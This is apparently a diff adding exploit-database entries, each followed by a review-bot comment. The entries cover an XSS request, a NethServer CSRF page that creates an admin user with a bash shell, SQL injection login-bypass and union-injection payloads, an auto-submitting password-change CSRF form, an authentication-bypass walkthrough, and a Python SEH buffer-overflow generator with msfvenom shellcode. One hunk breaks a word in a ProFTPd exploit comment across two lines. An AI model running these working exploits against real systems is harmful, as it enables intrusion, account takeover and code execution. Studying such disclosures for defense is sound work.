[xz content omitted]
|
||||
------WebKitFormBoundary8FfEu2Tn6fUOnT80
|
||||
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"
|
||||
|
||||
<script>confirm(017)</script>
|
||||
------WebKitFormBoundary8FfEu2Tn6fUOnT80--
|
||||
|
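Review bot: the title says "CSRF Script Insertion" but the Desc paragraph only describes an authenticated stored XSS in `BackupConfig[Upload][Description]`; either explain the CSRF part or drop it from the title. The PoC request also carries a session identifier in the `Cookie: nethgui=...` header, which should be redacted, and the advisory gives no fixed version or mitigation for 7.3.1611.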
58
platforms/json/webapps/42580.html
Executable file
|
@ -0,0 +1,58 @@
|
|||
<!--
|
||||
|
||||
NethServer 7.3.1611 (create.json) CSRF Create User And Enable SSH Access
|
||||
|
||||
|
||||
Vendor: NethServer.org
|
||||
Product web page: https://www.nethserver.org
|
||||
Affected version: 7.3.1611-u1-x86_64
|
||||
|
||||
Summary: NethServer is an operating system for the Linux
|
||||
enthusiast, designed for small offices and medium enterprises.
|
||||
It's simple, secure and flexible.
|
||||
|
||||
Desc: The application interface allows users to perform certain
|
||||
actions via HTTP requests without performing any validity checks
|
||||
to verify the requests. This can be exploited to perform certain
|
||||
actions with administrative privileges if a logged-in user visits
|
||||
a malicious web site.
|
||||
|
||||
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
|
||||
CentOS Linux 7.3.1611 (Core)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2017-5433
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5433.php
|
||||
|
||||
|
||||
16.08.2017
|
||||
|
||||
-->
|
||||
|
||||
|
||||
HTML Decoded PoC:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="https://172.19.0.195:980/en-US/Account/User/create.json" method="POST">
|
||||
<input type="hidden" name="Account[User][create][username]" value="Blabla" />
|
||||
<input type="hidden" name="Account[User][create][gecos]" value="Test1" />
|
||||
<input type="hidden" name="Account[User][create][groups]" value="" />
|
||||
<input type="hidden" name="Account[User][create][groups][1]" value="admin@zsl.lsz" />
|
||||
<input type="hidden" name="Account[User][create][expires]" value="no" />
|
||||
<input type="hidden" name="Account[User][create][shell]" value="/usr/libexec/openssh/sftp-server" />
|
||||
<input type="hidden" name="Account[User][create][shell]" value="/bin/bash" />
|
||||
<input type="hidden" name="Account[User][create][setPassword]" value="disabled" />
|
||||
<input type="hidden" name="Account[User][create][setPassword]" value="enabled" />
|
||||
<input type="hidden" name="Account[User][create][newPassword]" value="gi3fme$heLL!" />
|
||||
<input type="hidden" name="Account[User][create][confirmNewPassword]" value="gi3fme$heLL!" />
|
||||
<input type="hidden" name="Account[User][create][Submit]" value="Submit" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
|
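Review bot: the line `HTML Decoded PoC:` sits after the closing `-->`, so in a file named 42580.html it is rendered as page text rather than commentary; move it inside the comment block. The Desc paragraph says requests are accepted "without performing any validity checks" but does not name the missing control (for example a per-session anti-CSRF token) or a fixed version, which is what an administrator running 7.3.1611 needs to know.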
@ -1,7 +1,8 @@
|
|||
/*
|
||||
* This is simple local exploit (Proof of Concept?) for local bug in ProFTPd
|
||||
* not in default options (must be configured with option --enable-ctrls).
|
||||
* Bug exist in function pr_ctrls_connect() in file "src/ctrls.c", look:
|
||||
* Bug exist in func
|
||||
tion pr_ctrls_connect() in file "src/ctrls.c", look:
|
||||
*
|
||||
* "src/ctrls.c"
|
||||
* int pr_ctrls_connect(const char *socket_file) {
|
||||
|
|
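Review bot: the new text breaks the word "function" across two lines (`* Bug exist in func` followed by `tion pr_ctrls_connect() in file "src/ctrls.c", look:`), and the continuation line has no leading ` * ` like the other lines of this block comment. The hunk grows from 7 to 8 lines only because of that split, so it looks like an accidental wrap; restore the single original line.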
46
platforms/php/webapps/42582.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
<!--
|
||||
# Exploit Title: Car or Cab Booking Script - SQL injection login bypass
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: N/A
|
||||
# Date: 28.08.2017
|
||||
# software link : http://www.phpscriptsmall.com/product/cab-booking-script/
|
||||
# Version: 3.04
|
||||
# Category: Webapps
|
||||
# Tested on: windows64bit / mozila firefox
|
||||
#
|
||||
#
|
||||
--!>
|
||||
|
||||
# ========================================================
|
||||
#
|
||||
#
|
||||
# Car or Cab Booking Script - SQL injection login bypass
|
||||
#
|
||||
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
|
||||
#
|
||||
# Proof of Concept : -
|
||||
#
|
||||
# http://localhost/taxibooking/login.php [ set username and password ] to >> admin' or 1=1 -- -
|
||||
# you must choose the check box as current and existing user
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# ========================================================
|
||||
# [+] Disclaimer
|
||||
#
|
||||
# Permission is hereby granted for the redistribution of this advisory,
|
||||
# provided that it is not altered except by reformatting it, and that due
|
||||
# credit is given. Permission is explicitly given for insertion in
|
||||
# vulnerability databases and similar, provided that due credit is given to
|
||||
# the author. The author is not responsible for any misuse of the information contained
|
||||
# herein and prohibits any malicious use of all security related information
|
||||
# or exploits by the author or elsewhere.
|
||||
#
|
||||
#
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
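Review bot: the Description line says the attacker logs in "as admin of the particular school", which does not fit a Car or Cab Booking Script and reads as copied from another advisory; reword it for this product. The header comment is closed with `--!>` rather than `-->`, and the text names no vulnerable parameter handling or fix (parameterized queries in the login check), which would make it useful to maintainers.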
42
platforms/php/webapps/42583.txt
Executable file
|
@ -0,0 +1,42 @@
|
|||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
<!--
|
||||
# Exploit Title: PHP Appointment Booking Script - injection login bypass
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: N/A
|
||||
# Date: 28.08.2017
|
||||
# software link : http://www.phpscriptsmall.com/product/php-appointment-booking-script/
|
||||
# Version: 3.04
|
||||
# Category: Webapps
|
||||
# Tested on: windows64bit / mozila firefox
|
||||
#
|
||||
#
|
||||
--!>
|
||||
|
||||
# ========================================================
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin
|
||||
#
|
||||
# Proof of Concept : -
|
||||
#
|
||||
# http://localhost/appointment/admin_login.php [ set username and password ] to >> admin' or 1=1 -- -
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# ========================================================
|
||||
# [+] Disclaimer
|
||||
#
|
||||
# Permission is hereby granted for the redistribution of this advisory,
|
||||
# provided that it is not altered except by reformatting it, and that due
|
||||
# credit is given. Permission is explicitly given for insertion in
|
||||
# vulnerability databases and similar, provided that due credit is given to
|
||||
# the author. The author is not responsible for any misuse of the information contained
|
||||
# herein and prohibits any malicious use of all security related information
|
||||
# or exploits by the author or elsewhere.
|
||||
#
|
||||
#
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
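Review bot: the Exploit Title reads "injection login bypass" with "SQL" missing, while the Description speaks of a malicious SQL query and the files.csv row says "Authentication Bypass"; use "SQL injection login bypass" consistently. "Version: 3.04" is the same value given in 42582.txt and 42584.txt for different products, so confirm it applies here, and the comment terminator `--!>` should be `-->`.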
53
platforms/php/webapps/42584.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
-----------------------------------------------------------------------------------
|
||||
|<!--
|
||||
# Exploit Title: User Login and Management PHP Script - multiple vulnerabilities
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: N/A
|
||||
# Date: 29.08.2017
|
||||
# software link : https://www.codester.com/items/469/user-login-and-management-php-script
|
||||
# demo : http://froiden.cloudapp.net/LoginDashboard/index.php
|
||||
# Version: 3.04
|
||||
# Category: Webapps
|
||||
# Tested on: windows64bit / mozila firefox
|
||||
#
|
||||
#
|
||||
|--!>
|
||||
|
||||
|----------------------------------------------------------------------------------
|
||||
|
||||
1) admin dashboard authentication bypass
|
||||
|
||||
Description : An Attackers are able to completely compromise the web application built upon
|
||||
the user login and management php script as they can gain access to the admin panel and
|
||||
manage other users as an admin without authentication!
|
||||
|
||||
|
||||
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php
|
||||
Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php
|
||||
|
||||
|
||||
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
|
||||
and thus have total control over the application and users , including add admin user .. etc
|
||||
|
||||
|
||||
|----------------------------------------------------------------------------------
|
||||
|
||||
|
||||
2) account takeover - cross side request forgery
|
||||
|
||||
|
||||
Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password
|
||||
|
||||
> exploitation <
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST">
|
||||
|
||||
<script type="text/javascript">document.csrf_form.submit();</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|-----------------------------------------EOF-----------------------------------------
|
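Review bot: section 1 shows that `admin/dashboard.php` is reachable once the client ignores the redirect to `admin/index.php`, but the text never states the root cause or a fix; presumably the page keeps rendering after the redirect is issued, so say that and recommend a server-side session check that stops processing. In section 2, "cross side request forgery" should read "cross-site request forgery", and the `demo` header line points at a live third-party host that should be removed or marked as not for testing.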
30
platforms/php/webapps/42585.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# # # # #
|
||||
# Exploit Title: PHP Video Battle Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 28.08.2017
|
||||
# Vendor Homepage: http://www.rocky.nu/
|
||||
# Software Link: http://www.rocky.nu/product/php-video-battle/
|
||||
# Demo: http://videobattle.rocky.nu/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/[SQL].html
|
||||
#
|
||||
# -1'+uNiOn+SeleCt++0x31,0x32,0x33,0x34,0x35,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x37+--+--+-.html
|
||||
#
|
||||
# http://localhost/[PATH]/videobattle.html?vote=[SQL]
|
||||
# http://localhost/[PATH]/videobattle.html?draw=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
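Review bot: the Description is one generic sentence and the list of affected inputs ends in "Etc..", so a maintainer cannot tell which inputs beyond the path segment, `vote` and `draw` need fixing. Enumerate the affected parameters that were actually tested and state the remediation (parameterized queries) instead of leaving the scope open.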
59
platforms/windows/local/42586.py
Executable file
|
@ -0,0 +1,59 @@
|
|||
|
||||
#!/usr/bin/python
|
||||
|
||||
###############################################################################
|
||||
# Exploit Title: Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)
|
||||
# Date: 28-08-2017
|
||||
# Exploit Author: Kishan Sharma
|
||||
# Email : thekishansharma@gmail.com
|
||||
# Vulnerable Software: Easy Vedio to PSP Converter
|
||||
# Vendor Homepage: http://www.divxtodvd.net/
|
||||
# Version: 1.6.20
|
||||
# Software Link: http://www.divxtodvd.net/easy_video_to_psp.exe
|
||||
# Tested On: Windows 7 x64
|
||||
# To reproduce the exploit:
|
||||
# 1. Click Register
|
||||
# 2. In the "Enter User Name" field, paste the content of test.txt
|
||||
#
|
||||
##############################################################################
|
||||
|
||||
|
||||
buffer = "\x41" * 1008 #Junk
|
||||
|
||||
nSEH = "\xeb\x10\x90\x90" #Short Jump
|
||||
|
||||
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
|
||||
SEH = "\x59\x78\x03\x10"
|
||||
|
||||
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
|
||||
|
||||
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
|
||||
buf = ""
|
||||
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
|
||||
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
|
||||
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
|
||||
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
|
||||
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
|
||||
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
|
||||
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
|
||||
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
|
||||
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
|
||||
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
|
||||
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
|
||||
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
|
||||
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
|
||||
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
|
||||
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
|
||||
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
|
||||
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
|
||||
|
||||
nops = "\x90" * 16 #Nops
|
||||
|
||||
badchars = "\x0a\x0d"
|
||||
|
||||
data = buffer + nSEH + SEH + nops + buf
|
||||
|
||||
f = open ("test.txt", "w")
|
||||
f.write(data)
|
||||
f.close()
|
||||
|
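Review bot: `badchars` is assigned twice with different values (`"\x00\x0a\x0d"` with the comment "and 0x80 to 0xff", then later `"\x0a\x0d"`) and is never read, so neither assignment documents anything reliable; keep a single comment stating the restricted bytes. The header also spells the product "Vedio" while the software link is `easy_video_to_psp.exe`, so confirm the vendor's spelling, and note that the header gives no fixed version or workaround.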